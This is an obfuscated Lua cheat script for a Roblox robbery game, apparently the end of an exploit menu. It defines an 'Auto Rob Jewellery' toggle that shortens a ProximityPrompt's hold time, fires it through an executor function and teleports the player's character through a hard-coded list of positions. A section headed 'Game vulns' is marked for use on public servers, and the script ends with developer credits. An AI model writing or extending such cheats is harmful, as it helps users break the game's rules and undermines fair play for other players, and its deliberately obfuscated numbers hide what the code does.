v17=v6:CreateToggle({Name="Auto Rob Jewellery (USE IN A PRIVATE SERVER)",CurrentValue=false,Flag="jewelleryrob",Callback=function(v182) v80=v182;if v80 then print("[âœ…] Farming started!");while v80 do local v286=1018 -(697 + 321) ;local v287;local v288;local v289;local v290;local v291;while true do if (v286==(0 -0)) then v287=game:GetService("Players").LocalPlayer;v288=v287.Character or v287.CharacterAdded:Wait() ;v286=1 -0 ;end if (v286==2) then if v290 then v290.HoldDuration=0.1 -0 ;end if v290 then fireproximityprompt(v290);end v286=3;end if (v286==(2 + 1)) then v291={CFrame.new(50.2858601 -31 ,1248.1099548 -(322 + 905) , -805.24823, -(612 -(602 + 9)),1189 -(449 + 740) ,872 -(826 + 46) ,947 -(245 + 702) ,3 -2 ,0 + 0 ,1898 -(260 + 1638) ,0, -(441 -(382 + 58))),CFrame.new( -(247.00372299999998 + 50),36.2264252 -18 , -(3302.42493 -2191), -1,0,0,0, -(1206 -(902 + 303)),0 -0 ,0 -0 ,0 + 0 ,1),CFrame.new( -544.647949,18.3649254, -989.277283, -(1691 -(1121 + 569)),214 -(22 + 192) ,0,683 -(483 + 200) , -(1464 -(1404 + 59)),0,0 -0 ,0 -0 ,766 -(468 + 297) ),CFrame.new( -(1268.137939 -892),17.7699909, -(2574.42493 -1463), -(1 -0),0,0 + 0 ,0, -1,0,236 -(141 + 95) ,0 + 0 ,1),CFrame.new( -(1663.9006960000002 -971),18.3649254, -992.729553, -1,0 + 0 ,0,0 -0 , -(1 + 0),0 + 0 ,0 -0 ,0,1 + 0 ),CFrame.new( -(168.403229 + 172),30.2264252 -12 , -(1876.42493 -(574 + 191)), -1,0 + 0 ,0 -0 ,0 + 0 , -(850 -(254 + 595)),126 -(55 + 71) ,0 -0 ,1790 -(573 + 1217) ,1),CFrame.new( -(40.288940000000025 + 476),28.3649254 -10 , -(1928.277283 -(714 + 225)), -1,0,0 -0 ,0 -0 , -(1 + 0),0 -0 ,806 -(118 + 688) ,48 -(25 + 23) ,1),CFrame.new( -(123.13018799999998 + 507),18.3649254, -991.776611, -(1887 -(927 + 959)),0,0 -0 ,732 -(16 + 716) , -(1 -0),97 -(11 + 86) ,0 -0 ,285 -(175 + 110) ,2 -1 ),CFrame.new( -586.279907,18.3649254, -(2785.277283 -(503 + 1293)), -1,0 -0 ,0 + 0 ,1061 -(810 + 251) , -(1 + 0),0 + 0 ,0 + 0 ,533 -(43 + 490) ,734 -(711 + 22) ),CFrame.new( -(1126.765656 -(240 + 619)),5.226425200000001 + 13 , -(1766.42493 -655), -(1 + 0),1744 -(1344 + 400) ,0,405 -(255 + 150) , -(1 + 0),0 + 0 ,0,0,1),CFrame.new( -(2610.5578610000002 -1999),57.364925400000004 -39 , -(2653.092468 -(404 + 1335)),406 -(183 + 223) ,0 -0 ,1 + 0 ,0, -(1 + 0),337 -(10 + 327) ,1 + 0 ,0,"-0"),CFrame.new( -693.194153,6.364925400000001 + 12 , -(1441.7295530000001 -(108 + 341)), -(1 + 0),0 -0 ,1493 -(711 + 782) ,0 -0 , -1,469 -(270 + 199) ,0 + 0 ,0,1)};for v337,v338 in ipairs(v291) do if v289 then v289.CFrame=v338;end wait(0.5);end break;end if (v286==1) then v289=v288:FindFirstChild("HumanoidRootPart");v290=workspace.Map.Robberies.Jewellery.Main:FindFirstChild("ProximityPrompt",true);v286=1821 -(580 + 1239) ;end end end else print("[ðŸ›‘] Farming stopped!");end end});local v7=v6:CreateSection("Game vulns (CAN USE IN A PUBLIC SERVER)");local v6=v5:CreateTab("Credits");local v7=v6:CreateSection("Credits:");local v82=v6:CreateLabel("Main developer - legendary_moose_25426",false);local v7=v6:CreateSection("Contributors:");local v82=v6:CreateLabel("Shade (s.hade)",false);local v82=v6:CreateLabel("bytecodemyass",false);local v82=v6:CreateLabel("32556324",false);local v7=v6:CreateSection("Current Version:");local v82=v6:CreateLabel("1.3F",false);print("Successfully loaded.");
